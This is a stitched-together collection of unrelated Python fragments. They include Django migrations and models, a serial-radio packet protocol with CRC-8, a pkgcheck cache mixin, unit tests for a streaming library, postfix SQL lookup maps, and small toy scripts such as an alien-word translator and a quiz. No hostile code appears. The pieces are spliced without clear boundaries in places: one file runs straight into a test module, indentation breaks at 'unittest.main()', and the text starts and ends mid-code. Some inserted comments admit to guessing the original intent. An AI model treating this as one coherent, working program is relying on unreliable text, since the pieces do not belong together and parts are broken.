             'feoung': 'eating',
             'yung': 'running',
             'looen': 'sleeping',
             'wouugn': 'going',
             'trongk': 'angry',
             'lola': 'Goodbye'
             }
identity = input("Who are you?")
Entered_word = input("Enter any word ")
# Checking condition that this person is Alien or Human
# BUG FIX: the original ended in the incomplete statement `for Entered_word`,
# a syntax error.  Completed as a dictionary lookup: aliens translate their
# word to English, humans translate English back to alien.
# (assumed intent -- TODO confirm against the full original script)
if identity == 'Alien':
    print(converter.get(Entered_word, 'Unknown word'))
else:
    reverse_converter = {english: alien for alien, english in converter.items()}
    print(reverse_converter.get(Entered_word, 'Unknown word'))
|
import unittest
from katas.kyu_7.russian_postal_codes import zip_validate


class ZipValidateTestCase(unittest.TestCase):
    """Tests for zip_validate (Russian postal codes).

    Per these cases, valid codes are exactly six digits; '056879' with a
    leading zero and the 7-digit '1111111' are expected to be rejected.
    """
    def test_true(self):
        self.assertTrue(zip_validate('198328'))

    def test_true_2(self):
        self.assertTrue(zip_validate('310003'))

    def test_true_3(self):
        self.assertTrue(zip_validate('424000'))

    def test_false(self):
        # non-digit character
        self.assertFalse(zip_validate('12A483'))

    def test_false_2(self):
        # symbol and wrong length
        self.assertFalse(zip_validate('1@63'))

    def test_false_3(self):
        # too short
        self.assertFalse(zip_validate('111'))

    def test_false_4(self):
        # leading zero
        self.assertFalse(zip_validate('056879'))

    def test_false_5(self):
        # too long
        self.assertFalse(zip_validate('1111111'))
|
"""Create tables from data-objects"""
# Author: Christian Brodbeck <christianbrodbeck@nyu.edu>
from ._table import difference, frequencies, melt, melt_ndvar, stats, repmeas
|
# -*- coding: utf-8 -*-
# Generated by Django 1.9.5 on 2018-01-19 01:46
from __future__ import unicode_literals
from django.db import migrations, models
import helpers.base.jsonfield
class Migration(migrations.Migration):
    # Auto-generated (Django 1.9.5): alters three fields on jianfanginfo.
    # Verbose names are escaped Chinese labels.

    dependencies = [
        ('liantang', '0004_auto_20180118_2046'),
    ]

    operations = [
        migrations.AlterField(
            model_name='jianfanginfo',
            name='date',
            field=models.DateField(blank=True, null=True, verbose_name='\u7533\u8bf7\u65e5\u671f'),
        ),
        migrations.AlterField(
            model_name='jianfanginfo',
            name='shenqing',
            # NOTE(review): default={} is a shared mutable default; confirm
            # the custom JsonField copes with this.
            field=helpers.base.jsonfield.JsonField(blank=True, default={}, verbose_name='\u7533\u8bf7\u6750\u6599'),
        ),
        migrations.AlterField(
            model_name='jianfanginfo',
            name='xieyi',
            field=helpers.base.jsonfield.JsonField(blank=True, default={}, verbose_name='\u534f\u8bae'),
        ),
    ]
|
from common.utils import get_nested_item
from functools import partial
from itertools import chain
import re
import unicodedata
def parse_bool(b):
    """Coerce *b* to a boolean.

    The strings 'true'/'false'/'1'/'0' (case-insensitive, after str())
    map explicitly; any other value falls back to Python truthiness.
    """
    explicit = {'true': True, '1': True, 'false': False, '0': False}
    return explicit.get(str(b).lower(), bool(b))
def normalize(text):
    """Uppercase *text* with accents/diacritics stripped.

    NFKD-decomposes the string, drops every non-ASCII codepoint, then
    uppercases what remains.
    """
    decomposed = unicodedata.normalize('NFKD', text)
    ascii_bytes = decomposed.encode('ASCII', errors='ignore')
    return ascii_bytes.decode('utf-8').upper()
def cleanup(text):
    """Normalize *text* for tokenization.

    Periods are deleted outright (so 'U.S.' -> 'US'), any other character
    outside A-Z/0-9/space becomes a space, and runs of spaces collapse
    into one.
    """
    without_dots = re.sub(r'\.', '', text)
    spaced = re.sub(r'[^A-Z0-9 ]', ' ', without_dots)
    return re.sub(r' +', ' ', spaced)
def tokenize(text):
    """Split *text* on single spaces into a list of tokens."""
    separator = ' '
    return text.split(separator)
def extract_keywords(literals):
    """Build a list of unique keywords (length > 2) from raw literals.

    None entries are dropped; the rest are accent-stripped, cleaned and
    tokenized, then deduplicated across all literals.  Tokens of one or
    two characters are filtered out.
    """
    token_lists = (
        tokenize(cleanup(normalize(literal)))
        for literal in literals
        if literal is not None
    )
    unique_tokens = set(chain.from_iterable(token_lists))
    return [token for token in unique_tokens if len(token) > 2]
def extract_literals(movement, field_list):
    """Return a lazy iterable of *movement*'s values for each field path.

    Each entry of field_list is resolved against movement with
    get_nested_item; the result is a map object (not materialized).
    """
    lookup = partial(get_nested_item, movement)
    return map(lookup, field_list)
|
import logging
import array
from twisted.internet import reactor
from twisted.internet.serialport import SerialPort
from twisted.internet.protocol import Protocol
def encode_bytes(a):
    """Render a sequence of byte values as a lowercase hex string."""
    parts = ['{:02x}'.format(byte) for byte in a]
    return ''.join(parts)
def decode_bytes(s):
    """Parse a hex string (two characters per byte) into a list of ints.

    BUG FIX: replaced Python-2-only `xrange` with `range`, which behaves
    identically for this loop and lets the module run under Python 3.
    """
    return [int(s[i:i+2], 16) for i in range(0, len(s), 2)]
def crc8(data):
    """Compute the CRC-8 (polynomial x^8 + x^2 + x + 1) of a byte sequence.

    Port of the chromiumos vboot reference implementation:
    https://chromium.googlesource.com/chromiumos/platform/vboot_reference/+/master/firmware/lib/crc8.c

    BUG FIX: replaced Python-2-only `xrange` with `range` (identical
    behavior here) so the routine also runs under Python 3.
    """
    crc = 0
    for b in data:
        crc ^= b << 8
        for _ in range(8):
            # Bit 15 is always cleared by the XOR before the shift, so crc
            # never grows beyond 16 bits despite Python's unbounded ints.
            if (crc & 0x8000) != 0:
                crc ^= (0x1070 << 3)
            crc <<= 1
    return crc >> 8
def _repr_hex_array(a):
    """Format a byte sequence as '[0xAA, 0xBB, ...]' for debug output."""
    body = ', '.join('0x{:02X}'.format(byte) for byte in a)
    return '[' + body + ']'
class Packet(object):
    """A framed serial packet: a type byte plus data and optional-data sections."""

    def __init__(self, packet_type, data, optional_data):
        self.packet_type = packet_type
        self.data = data
        self.optional_data = optional_data

    def __str__(self):
        return 'Packet(0x{:02X}, {}, {})'.format(
            self.packet_type,
            _repr_hex_array(self.data),
            _repr_hex_array(self.optional_data))

    __repr__ = __str__

    def encode(self):
        """Serialize to the on-wire byte list:
        sync (0x55), 4-byte header, header CRC, payload, payload CRC."""
        payload = self.data + self.optional_data
        data_len = len(self.data)
        header = [data_len >> 8, data_len & 0xff, len(self.optional_data), self.packet_type]
        return [0x55] + header + [crc8(header)] + payload + [crc8(payload)]

    @classmethod
    def read(clazz, data):
        """Build a Packet from one complete raw frame (sync byte through data CRC)."""
        data_len = (data[1] << 8) + data[2]
        packet_type = data[4]
        # Everything between the header CRC (index 5) and the trailing data CRC.
        payload = data[6:-1]
        return clazz(packet_type, payload[:data_len], payload[data_len:])

    @classmethod
    def from_string(clazz, s):
        """Parse the dotted-hex 'type.data.optdata' representation."""
        fields = s.split('.')
        if len(fields) != 3:
            raise ValueError('Bad format')
        type_hex, data_hex, optional_hex = fields
        return clazz(decode_bytes(type_hex)[0], decode_bytes(data_hex), decode_bytes(optional_hex))

    def to_string(self):
        """Inverse of from_string: dotted lowercase-hex representation."""
        sections = (encode_bytes([self.packet_type]),
                    encode_bytes(self.data),
                    encode_bytes(self.optional_data))
        return '.'.join(sections)
class RadioReceiverProtocol(Protocol):
    """Twisted protocol that reassembles framed packets from a serial stream.

    Frames start with a 0x55 sync byte, then a 4-byte header, a header
    CRC, the payload and a payload CRC (see Packet).  This module is
    Python 2 (print statements).
    """
    def __init__(self, radio):
        self.radio = radio
        # Raw receive buffer: byte values not yet assembled into a frame.
        self.data = []

    def gotPacket(self, data):
        #print 'got packet: ' + _repr_hex_array(data)
        self.radio.gotPacket(Packet.read(data))

    def dataReceived(self, data):
        # Append incoming bytes, then pull out as many complete frames as possible.
        self.data += array.array('B', data)
        while True:
            # Discard noise until a 0x55 sync byte sits at the front.
            while len(self.data) > 0 and self.data[0] != 0x55:
                print 'additional data: ', self.data[0]
                self.data = self.data[1:]
            # Need at least sync + header (4) + header CRC + data CRC = 7 bytes.
            if len(self.data) < 7:
                break
            data_len = (self.data[1]<<8) + self.data[2]
            opt_data_len = self.data[3]
            #packet_type = self.data[4]
            header_crc = self.data[5]
            if crc8(self.data[1:5]) != header_crc:
                logging.info("Bad header CRC")
                # Bad header: drop the sync byte and rescan from the next byte.
                self.data = self.data[1:]
                continue
            total_len = 6 + data_len + opt_data_len + 1
            if len(self.data) < total_len:
                # Frame not fully received yet; wait for more bytes.
                break
            if crc8(self.data[6:(total_len-1)]) != self.data[total_len-1]:
                logging.info("Bad data CRC")
            else:
                self.gotPacket(self.data[:total_len])
            self.data = self.data[total_len:]
        # Safety valve: never let leftover garbage grow without bound.
        if len(self.data) > 100:
            self.data = []
class Radio(object):
    """Owns the serial port and fans received packets out to listeners."""

    def connect(self, port):
        # 57600-baud serial link driven by the Twisted reactor.
        self.serial = SerialPort(RadioReceiverProtocol(self), port, reactor, baudrate=57600)
        self.serial.flushInput()

    def __init__(self):
        # Callables invoked with each received Packet.
        self.listeners = []
        self.serial = None

    def send(self, packet):
        # NOTE(review): array.tostring() was removed in Python 3.9; this
        # module is Python 2 (print statements) so it still works here.
        data = array.array('B', packet.encode()).tostring()
        print 'tx:', packet
        if self.serial is not None:
            self.serial.write(data)

    def gotPacket(self, packet):
        print 'rx:', packet
        for l in self.listeners:
            l(packet)
# Module-level singleton used by start_radio().
RADIO = Radio()


def start_radio(port='/dev/ttyAMA0'):
    """Connect the global RADIO instance to the given serial device."""
    logging.info('Starting radio at {}'.format(port))
    RADIO.connect(port)
|
# Generated by Django 3.1.7 on 2021-03-15 12:21
from django.db import migrations, models
class Migration(migrations.Migration):
    # Auto-generated (Django 3.1.7): makes user_profile a required
    # ImageField uploading to 'userprofiles'.

    dependencies = [
        ('home', '0001_initial'),
    ]

    operations = [
        migrations.AlterField(
            model_name='extendexd_user_model',
            name='user_profile',
            field=models.ImageField(db_column='user_profile', upload_to='userprofiles', verbose_name='Select Profile Picture'),
        ),
    ]
|
from django.db import models
from django import forms
from south.db import db
# NOTE(review): monkeypatch -- makes db_index default to True for EVERY
# model field in this process, not just this app's models; confirm this
# is intentional.
models.Field.db_index = True
import datetime
class Aboutme(models.Model):
    """'About me' entry: name, slug, free-text description and an image."""
    name = models.CharField(max_length=200)
    slug = models.SlugField(unique=True)
    description = models.TextField(blank=True)
    image = models.ImageField(upload_to="Imagethumbs/", max_length=200, blank=True)

    class Media:
        # TinyMCE assets loaded by the admin for rich-text editing.
        js = ('/static/js/tiny_mce/tiny_mce.js', '/static/js/tiny_mce/textareas.js')

    def __unicode__(self):
        return self.name
class Education(models.Model):
    """Education entry linked to a Course, with a college link."""
    name = models.CharField(max_length=200)
    slug = models.SlugField(unique=True)
    description = models.TextField(blank=True)
    course = models.ForeignKey('Course')
    collegelink = models.URLField(max_length=200)
    #courses = models.TextField(blank=True)

    class Media:
        # TinyMCE assets loaded by the admin for rich-text editing.
        js = ('/static/js/tiny_mce/tiny_mce.js', '/static/js/tiny_mce/textareas.js')

    def __unicode__(self):
        return self.name
class Course(models.Model):
    """A course referenced by Education entries."""
    name = models.CharField(max_length=200)
    slug = models.SlugField(unique=True)
    description = models.TextField(blank=True)
    #link = models.URLField(max_length=200)

    def __unicode__(self):
        return self.name
class Languages(models.Model):
    """A programming/natural language skill with experience notes."""
    name = models.CharField(max_length=255)
    slug = models.SlugField(unique=True)
    experience = models.TextField(blank=True)
    link = models.URLField(max_length=200)
    image = models.ImageField(upload_to="Imagethumbs/", max_length=200, blank=True)

    class Media:
        # TinyMCE assets loaded by the admin for rich-text editing.
        js = ('/static/js/tiny_mce/tiny_mce.js', '/static/js/tiny_mce/textareas.js')

    def __unicode__(self):
        return self.name
class Software(models.Model):
    """A software tool/skill entry."""
    name = models.CharField(max_length=200)
    slug = models.SlugField(unique=True)
    software = models.TextField(blank=True)
    image = models.ImageField(upload_to="Imagethumbs/", max_length=200, blank=True)

    class Media:
        # TinyMCE assets loaded by the admin for rich-text editing.
        js = ('/static/js/tiny_mce/tiny_mce.js', '/static/js/tiny_mce/textareas.js')

    def __unicode__(self):
        return self.name
class Environment(models.Model):
    """A working-environment entry (referenced by Skills)."""
    name = models.CharField(max_length=200)
    slug = models.SlugField(unique=True)
    description = models.TextField(blank=True)
    image = models.ImageField(upload_to="Imagethumbs/", max_length=200, blank=True)

    class Media:
        # TinyMCE assets loaded by the admin for rich-text editing.
        js = ('/static/js/tiny_mce/tiny_mce.js', '/static/js/tiny_mce/textareas.js')

    def __unicode__(self):
        return self.name
class Skills(models.Model):
    """Skill entry tying together a language, a software and an environment."""
    name = models.CharField(max_length=200)
    slug = models.SlugField(unique=True)
    language = models.ForeignKey('Languages')
    software = models.ForeignKey('Software')
    environment = models.ForeignKey('Environment')

    class Media:
        # TinyMCE assets loaded by the admin for rich-text editing.
        js = ('/static/js/tiny_mce/tiny_mce.js', '/static/js/tiny_mce/textareas.js')

    def __unicode__(self):
        return self.name
class Company(models.Model):
    """A company plus the job title held there (referenced by Experience)."""
    name = models.CharField(max_length=200)
    slug = models.SlugField(unique=True)
    title = models.CharField(max_length=200)
    description = models.TextField(blank=True)
    link = models.URLField(max_length=200)
    image = models.ImageField(upload_to="Imagethumbs/", max_length=200, blank=True)

    class Media:
        # TinyMCE assets loaded by the admin for rich-text editing.
        js = ('/static/js/tiny_mce/tiny_mce.js', '/static/js/tiny_mce/textareas.js')

    def __unicode__(self):
        return self.name
class Experience(models.Model):
    """Work-experience entry pointing at a Company."""
    company = models.ForeignKey('Company')
    slug = models.SlugField(unique=True)

    def __unicode__(self):
        # BUG FIX: this model has no `name` field, so `return self.name`
        # raised AttributeError whenever the object was rendered (admin,
        # shell, templates).  Use the slug, the model's only readable field.
        return self.slug
class MediaCredit(models.Model):
    """Attribution entry for media used on the site: name, link, image."""
    name = models.CharField(max_length=200)
    link = models.URLField(max_length=200)
    image = models.ImageField(upload_to="Imagethumbs/", max_length=200, blank=True)

    def __unicode__(self):
        return self.name
class ContactForm(forms.Form):
    """Simple contact form: subject, message body and sender e-mail."""
    subject = forms.CharField(max_length=200,widget=forms.TextInput(attrs={'size':65}))
    message = forms.CharField(widget=forms.Textarea(attrs={'rows':15, 'cols':61}))
    sender = forms.EmailField(widget=forms.TextInput(attrs={'size':65}))
    #cc_myself = forms.BooleanField(required=False)
class Hit(models.Model):
    """Page-hit record storing visitor IP and session key with a timestamp."""
    #allview = models.ForeignKey(Question, related_name='questionviews')
    ip = models.CharField(max_length=40)
    session = models.CharField(max_length=40)
    # BUG FIX: `DateTimeField(datetime.datetime.now())` called now() ONCE at
    # import time and passed the result as the positional `verbose_name`
    # argument, so rows never received a creation timestamp.  Pass the
    # callable as `default=` so each row is stamped when it is created.
    created = models.DateTimeField(default=datetime.datetime.now)
# Create your models here.
|
"""Base cache support."""
import errno
import os
import pathlib
import shutil
from operator import attrgetter
from typing import NamedTuple
from snakeoil import klass
from snakeoil.cli.exceptions import UserException
from snakeoil.mappings import ImmutableDict
from snakeoil.osutils import pjoin
from . import const
class CacheData(NamedTuple):
    """Cache registry data."""
    type: str     # cache type name, used as the key in CachedAddon.existing()
    file: str     # cache file name looked up under each repo's cache dir
    version: int  # cache format version
class Cache:
    """Mixin for data caches."""
    # Delegate unknown attribute access to the wrapped `_cache` object.
    __getattr__ = klass.GetAttrProxy('_cache')
class _RegisterCache(type):
    """Metaclass registering every concrete cache class at definition time.

    Any class other than the CachedAddon base must define a non-None
    `cache` attribute; it is recorded in the shared `caches` registry,
    otherwise a ValueError is raised.
    """
    def __new__(cls, name, bases, namespace):
        new_cls = super().__new__(cls, name, bases, namespace)
        is_registry_base = new_cls.__name__ == 'CachedAddon'
        if not is_registry_base:
            if new_cls.cache is None:
                raise ValueError(f'invalid cache registry: {new_cls!r}')
            new_cls.caches[new_cls] = new_cls.cache
        return new_cls
class CachedAddon(metaclass=_RegisterCache):
    """Mixin for addon classes that create/use data caches."""

    # attributes for cache registry
    cache = None
    # registered cache types
    caches = {}

    def update_cache(self, force=False):
        """Update related cache and push updates to disk."""
        raise NotImplementedError(self.update_cache)

    @staticmethod
    def cache_dir(repo):
        """Return the cache directory for a given repository."""
        return pjoin(const.USER_CACHE_DIR, 'repos', repo.repo_id.lstrip(os.sep))

    def cache_file(self, repo):
        """Return the cache file for a given repository."""
        return pjoin(self.cache_dir(repo), self.cache.file)

    @classmethod
    def existing(cls):
        """Mapping of all existing cache types to file paths."""
        caches_map = {}
        repos_dir = pjoin(const.USER_CACHE_DIR, 'repos')
        # Scan every repo cache dir for each registered cache's file name.
        for cache in sorted(cls.caches.values(), key=attrgetter('type')):
            caches_map[cache.type] = tuple(sorted(
                pathlib.Path(repos_dir).rglob(cache.file)))
        return ImmutableDict(caches_map)

    @staticmethod
    def update_caches(options, addons):
        """Update all known caches."""
        ret = []
        force = getattr(options, 'force_cache', False)
        for addon in addons:
            ret.append(addon.update_cache(force=force))
        return any(ret)

    @classmethod
    def remove_caches(cls, options):
        """Remove all or selected caches."""
        force = getattr(options, 'force_cache', False)
        if force:
            # Forced removal nukes the entire user cache directory.
            try:
                shutil.rmtree(const.USER_CACHE_DIR)
            except FileNotFoundError:
                pass
            except IOError as e:
                raise UserException(f'failed removing cache dir: {e}')
        else:
            # Selective removal: only cache types enabled in options.cache.
            try:
                for cache_type, paths in cls.existing().items():
                    if options.cache.get(cache_type, False):
                        for path in paths:
                            if options.dry_run:
                                print(f'Would remove {path}')
                            else:
                                path.unlink()
                                # remove empty cache dirs
                                try:
                                    while str(path) != const.USER_CACHE_DIR:
                                        path.parent.rmdir()
                                        path = path.parent
                                except OSError as e:
                                    # A non-empty parent just ends the upward walk.
                                    if e.errno == errno.ENOTEMPTY:
                                        continue
                                    raise
            except IOError as e:
                raise UserException(f'failed removing {cache_type} cache: {path!r}: {e}')
        return 0
|
# Generated by Django 2.1.2 on 2018-11-07 01:43
from django.db import migrations, models
class Migration(migrations.Migration):
    # Auto-generated (Django 2.1.2): adds a 'ciudad' choice field to persona.

    dependencies = [
        ('misPerrisDJ', '0009_auto_20181106_2237'),
    ]

    operations = [
        migrations.AddField(
            model_name='persona',
            name='ciudad',
            field=models.CharField(choices=[('', 'Seleccione una ciudad'), ('santiago', 'Santiago')], default='', max_length=50),
        ),
    ]
|
from django.contrib import admin
from django.urls import path
from drf_yasg import openapi
from drf_yasg.views import get_schema_view
from . import views
# OpenAPI schema view served by drf-yasg for the browsable API docs.
schema_view = get_schema_view(
    openapi.Info(
        title="Predictor",
        default_version='v1',
        description="Test description",
        terms_of_service="https://www.google.com/policies/terms/",
        contact=openapi.Contact(email="contact@snippets.local"),
        license=openapi.License(name="BSD License"),
    ),
    public=True,  # schema is visible without authentication
)

urlpatterns = [
    # Swagger UI for the schema above (caching disabled).
    path('swagger/', schema_view.with_ui('swagger', cache_timeout=0), name='schema-swagger-ui'),
    # POST requests dispatch to PredictorViewSet.create.
    path('name_maker/', views.PredictorViewSet.as_view(
        {"post": "create"})
    ),
]
import sys
# Make the project root importable when running this test file directly.
sys.path.append('../../')
import unittest
from mock import IgorMock, ClientMock
from igor.core import Stream, ProcessOutput, handler_wrapper, flatten
import json
import time
import asyncio
class TestDictionaryFlatten(unittest.TestCase):
    """Tests for core.flatten: nested dicts collapse to dot-joined keys."""

    def test_flatten(self):
        dictionary = {
            'a': {
                'b': 'c'
            },
            'd': 'e'
        }
        flattened = flatten(dictionary)
        values = list(flattened.values())
        keys = list(flattened.keys())
        if len(keys) != 2 or len(values) != 2:
            self.fail('Flattened dictionary should have two keys and two values')
        # NOTE(review): the index checks below assume a specific output key
        # ordering ('d' before 'a.b') -- confirm flatten guarantees it.
        if keys[1] != 'a.b':
            self.fail('Flattened dictionary should have merged key names')
        if keys[0] != 'd' or values[0] != 'e':
            self.fail('Flattened dictionary should leave root level fields untouched')
        if values[1] != 'c':
            self.fail('Flattened fields should have correct values')
class TestStream(unittest.TestCase):
    """Tests for igor.core.Stream: the JSON wire format of send/send_error/close."""

    def setUp(self):
        self.STREAM_ID = 'STREAM_ID'
        self.CLIENT_ID = "CLIENT_ID"
        self.igor_mock = IgorMock()
        self.client_mock = ClientMock(self.CLIENT_ID)

    def test_send(self):
        """send() serializes {streamId, data} as JSON to the stream's client."""
        STREAM_DATA = {'test': 'test'}
        def mocked_send_message(client, serialized_message):
            try:
                serialized_message = json.loads(serialized_message)
            except Exception:
                self.fail('Stream data should be JSON serializable string')
            self.assertEqual(serialized_message['streamId'], self.STREAM_ID, 'Stream id should match')
            self.assertEqual(serialized_message['data'], STREAM_DATA, 'Stream data should match')
            self.assertEqual(client.id, self.CLIENT_ID, 'Clients id should match')
        self.igor_mock.server.send_message = mocked_send_message
        stream = Stream(self.igor_mock, self.client_mock, self.STREAM_ID, None)
        stream.send(STREAM_DATA)

    def test_send_error(self):
        """send_error() serializes {streamId, error} as JSON to the client."""
        STREAM_ERROR = 'ERROR'
        def mocked_send_message(client, serialized_message):
            try:
                serialized_message = json.loads(serialized_message)
            except Exception:
                self.fail('Stream data should be JSON serializable string')
            self.assertEqual(serialized_message['streamId'], self.STREAM_ID, 'Stream id should match')
            self.assertEqual(serialized_message['error'], STREAM_ERROR, 'Stream error should match')
            self.assertEqual(client.id, self.CLIENT_ID, 'Clients id should match')
        self.igor_mock.server.send_message = mocked_send_message
        stream = Stream(self.igor_mock, self.client_mock, self.STREAM_ID, None)
        stream.send_error(STREAM_ERROR)

    def test_close(self):
        """close() sends a {close: True} message and fires the close callback."""
        did_call_callback = {'value': False}
        def mocked_send_message(client, serialized_message):
            try:
                serialized_message = json.loads(serialized_message)
            except Exception:
                self.fail('Stream data should be JSON serializable string')
            close = serialized_message.get('close', None)
            if close == None:
                self.fail('Stream closing message should have "close" field')
            self.assertEqual(serialized_message['streamId'], self.STREAM_ID, 'Stream id should match')
            self.assertEqual(client.id, self.CLIENT_ID, 'Clients id should match')
            self.assertEqual(close, True, '"close" should have value True')
        def mocked_close_callback(igor_server, stream_id):
            did_call_callback['value'] = True
            self.assertEqual(stream_id, self.STREAM_ID, 'Stream id should match')
            self.assertEqual(igor_server, self.igor_mock, 'Igor server instance should be passed')
        self.igor_mock.server.send_message = mocked_send_message
        stream = Stream(self.igor_mock, self.client_mock, self.STREAM_ID, mocked_close_callback)
        stream.close()
        # Callback fires asynchronously; give it a moment before asserting.
        time.sleep(0.2)
        self.assertEqual(did_call_callback['value'], True, 'Stream should call "on_close_callback"')
class TestProcessOutput(unittest.TestCase):
    """Tests for igor.core.ProcessOutput: targeted sends, broadcasts and finish."""

    def setUp(self):
        self.STREAM_ID = 'STREAM_ID'
        self.PROCESS_ID = "PROCESS_ID"
        self.CLIENT_ID = "CLIENT_ID"
        self.ACTION = "ACTION"
        self.client_mock = ClientMock(self.CLIENT_ID)
        self.igor_mock = IgorMock()
        self.igor_mock.clients = {
            'CLIENT_ID': self.client_mock
        }

    def test_send_to_valid_client(self):
        """send(..., client_id=...) targets just that client with process-id stream."""
        STREAM_DATA = {'test': 'test'}
        def mocked_send_message(client, serialized_message):
            try:
                serialized_message = json.loads(serialized_message)
            except Exception:
                self.fail('Stream data should be JSON serializable string')
            self.assertEqual(serialized_message['streamId'], self.PROCESS_ID, 'Stream id should match process id')
            self.assertEqual(serialized_message['data'], STREAM_DATA, 'Stream data should match')
            self.assertEqual(client, self.client_mock, 'Clients should match')
        self.igor_mock.server.send_message = mocked_send_message
        output = ProcessOutput(self.PROCESS_ID, self.igor_mock, None)
        output.send(self.ACTION, STREAM_DATA, client_id=self.CLIENT_ID)

    def test_send_to_nonexisting_client(self):
        """send() to an unknown client id raises."""
        output = ProcessOutput(self.PROCESS_ID, self.igor_mock, None)
        self.assertRaises(
            Exception,
            'Sending message to invalid client id should raise an Exception',
            output.send,
            self.ACTION,
            None,
            client_id='NONEXISING_CLIENT'
        )

    def test_send_to_all(self):
        """send() without client_id broadcasts via send_message_to_all."""
        was_send_to_all_called = {'value': False}
        STREAM_DATA = {'test': 'test'}
        def mocked_send_message_to_all(serialized_message):
            was_send_to_all_called['value'] = True
            try:
                serialized_message = json.loads(serialized_message)
            except Exception:
                self.fail('Stream data should be JSON serializable string')
            self.assertEqual(serialized_message['streamId'], self.PROCESS_ID, 'Stream id should match process id')
            self.assertEqual(serialized_message['data'], STREAM_DATA, 'Stream data should match')
        self.igor_mock.server.send_message_to_all = mocked_send_message_to_all
        output = ProcessOutput(self.PROCESS_ID, self.igor_mock, None)
        output.send(self.ACTION, STREAM_DATA)
        # Broadcast happens asynchronously; wait briefly before asserting.
        time.sleep(0.2)
        self.assertEqual(was_send_to_all_called['value'], True, 'Should call "send_message_to_all" on server')

    def test_send_error(self):
        """send_error(..., client_id=...) serializes {streamId, error} to that client."""
        STREAM_ERROR = 'STREAM_ERROR'
        def mocked_send_message(client, serialized_message):
            try:
                serialized_message = json.loads(serialized_message)
            except Exception:
                self.fail('Stream data should be JSON serializable string')
            self.assertEqual(serialized_message['streamId'], self.PROCESS_ID, 'Stream id should match process id')
            self.assertEqual(serialized_message['error'], STREAM_ERROR, 'Stream error should match')
            self.assertEqual(client, self.client_mock, 'Clients should match')
        self.igor_mock.server.send_message = mocked_send_message
        output = ProcessOutput(self.PROCESS_ID, self.igor_mock, None)
        output.send_error(STREAM_ERROR, client_id=self.CLIENT_ID)

    def test_finish(self):
        """finish() broadcasts {close: True}, marks output closed and fires the callback."""
        did_call_callback = {'value': False}
        def mocked_send_message_to_all(serialized_message):
            try:
                serialized_message = json.loads(serialized_message)
            except Exception:
                self.fail('Stream data should be JSON serializable string')
            close = serialized_message.get('close', None)
            if close == None:
                self.fail('Stream closing message should have "close" field')
            self.assertEqual(serialized_message['streamId'], self.PROCESS_ID, 'Stream id should match')
            self.assertEqual(close, True, '"close" should have value True')
        def mocked_finish_callback(igor_server, stream_id):
            did_call_callback['value'] = True
            self.assertEqual(stream_id, self.PROCESS_ID, 'Stream id should match')
            self.assertEqual(igor_server, self.igor_mock, 'Igor server instance should be passed')
        self.igor_mock.server.send_message_to_all = mocked_send_message_to_all
        output = ProcessOutput(self.PROCESS_ID, self.igor_mock, mocked_finish_callback)
        output.finish()
        self.assertEqual(output.closed, True, 'Ouput "closed" field value should be True')
        # Callback fires asynchronously; wait briefly before asserting.
        time.sleep(0.2)
        self.assertEqual(did_call_callback['value'], True, 'Should call "on_finish_callback"')
class TestHandlerWrapper(unittest.TestCase):
    """handler_wrapper must run the handler coroutine and close the stream
    afterwards."""

    def setUp(self):
        self.STREAM_ID = 'STREAM_ID'
        self.igor_mock = IgorMock()

        def mock_send_message(client, serialized_message):
            pass
        self.igor_mock.server.send_message = mock_send_message
        self.CLIENT_ID = "CLIENT_ID"
        self.client_mock = ClientMock(self.CLIENT_ID)
        self.loop = asyncio.new_event_loop()
        asyncio.set_event_loop(None)

    def tearDown(self):
        # FIX: the loop created in setUp was never closed, leaking an event
        # loop (and its selector/file descriptors) per test.
        self.loop.close()

    def test_if_closes_stream(self):
        """The wrapped function runs with the stream/data, then the close
        callback fires with the same igor server and stream id."""
        did_call_callback = {'value': False}
        did_call_function = {'value': False}
        STREAM_DATA = {'test': 'test'}

        def mocked_close_callback(igor_server, stream_id):
            self.assertEqual(stream_id, self.STREAM_ID, 'Stream id should match')
            self.assertEqual(igor_server, self.igor_mock, 'Igor server instance should be passed')
            did_call_callback['value'] = True

        stream = Stream(self.igor_mock, self.client_mock, self.STREAM_ID, mocked_close_callback)

        def function(stream, data, **kwargs):
            did_call_function['value'] = True
            self.assertEqual(stream.stream_id, self.STREAM_ID, 'Stream id should match')
            self.assertEqual(data, STREAM_DATA, 'Stream data should match')

        self.loop.run_until_complete(handler_wrapper(function, stream, STREAM_DATA, {}, {}))
        time.sleep(0.1)
        self.assertEqual(did_call_function['value'], True, 'Should call function')
        self.assertEqual(did_call_callback['value'], True, 'Should close stream after handler function finish')
if __name__ == '__main__':
unittest.main() |
"""Map file definitions for postfix."""
class RelayDomainsMap(object):
    """Map file to list all relay domains."""

    filename = "sql-relaydomains.cf"

    # All three backends share the same SELECT; they differ only in how the
    # boolean ``enabled`` column is tested.
    _BASE = (
        "SELECT name FROM admin_domain "
        "WHERE name='%s' AND type='relaydomain' AND "
    )
    mysql = _BASE + "enabled=1"
    postgres = _BASE + "enabled"
    sqlite = _BASE + "enabled=1"
class SplitedDomainsTransportMap(object):
    """A transport map for splited domains.

    (ie. ones with both local and remote mailboxes)
    """

    filename = "sql-spliteddomains-transport.cf"

    # Common SELECT + JOINs shared by every backend.
    _JOINS = (
        "SELECT 'lmtp:unix:private/dovecot-lmtp' "
        "FROM admin_domain AS dom "
        "INNER JOIN admin_mailbox AS mbox ON dom.id=mbox.domain_id "
        "INNER JOIN core_user AS u ON mbox.user_id=u.id "
    )
    mysql = _JOINS + (
        "WHERE dom.type='relaydomain' AND dom.enabled=1 "
        "AND dom.name='%d' AND u.is_active=1 "
        "AND mbox.address='%u'"
    )
    postgres = _JOINS + (
        "WHERE dom.type='relaydomain' AND dom.enabled "
        "AND dom.name='%d' AND u.is_active "
        "AND mbox.address='%u'"
    )
    # SQLite tests booleans as integers, exactly like MySQL.
    sqlite = mysql
class RelayRecipientVerification(object):
    """A map file to enable recipient verification."""

    filename = "sql-relay-recipient-verification.cf"

    # The lookup is identical for every backend.
    _QUERY = "SELECT action FROM relaydomains_recipientaccess WHERE pattern='%d'"
    mysql = _QUERY
    postgres = _QUERY
    sqlite = _QUERY
|
from Question import Question
# Prompt text shown for each multiple-choice question.
question_prompts = [
    "What color are apples? \n(a) Red/Green\n(b) Purple\n(c) Orange\n(d) Yellow\n\n",
    "What color are Bananas? \n(a) Yellow/Green\n(b) Violet\n(c) Black\n(d) Brown\n\n",
    "What color are Strawberries? \n(a) Blue/Yellow\n(b) Magenta\n(c) Orange\n(d) Red\n\n",
]

# Correct answer letter for each prompt, in the same order.
_correct_answers = ("a", "a", "d")
questions = [Question(prompt, answer)
             for prompt, answer in zip(question_prompts, _correct_answers)]
def run_test(questions):
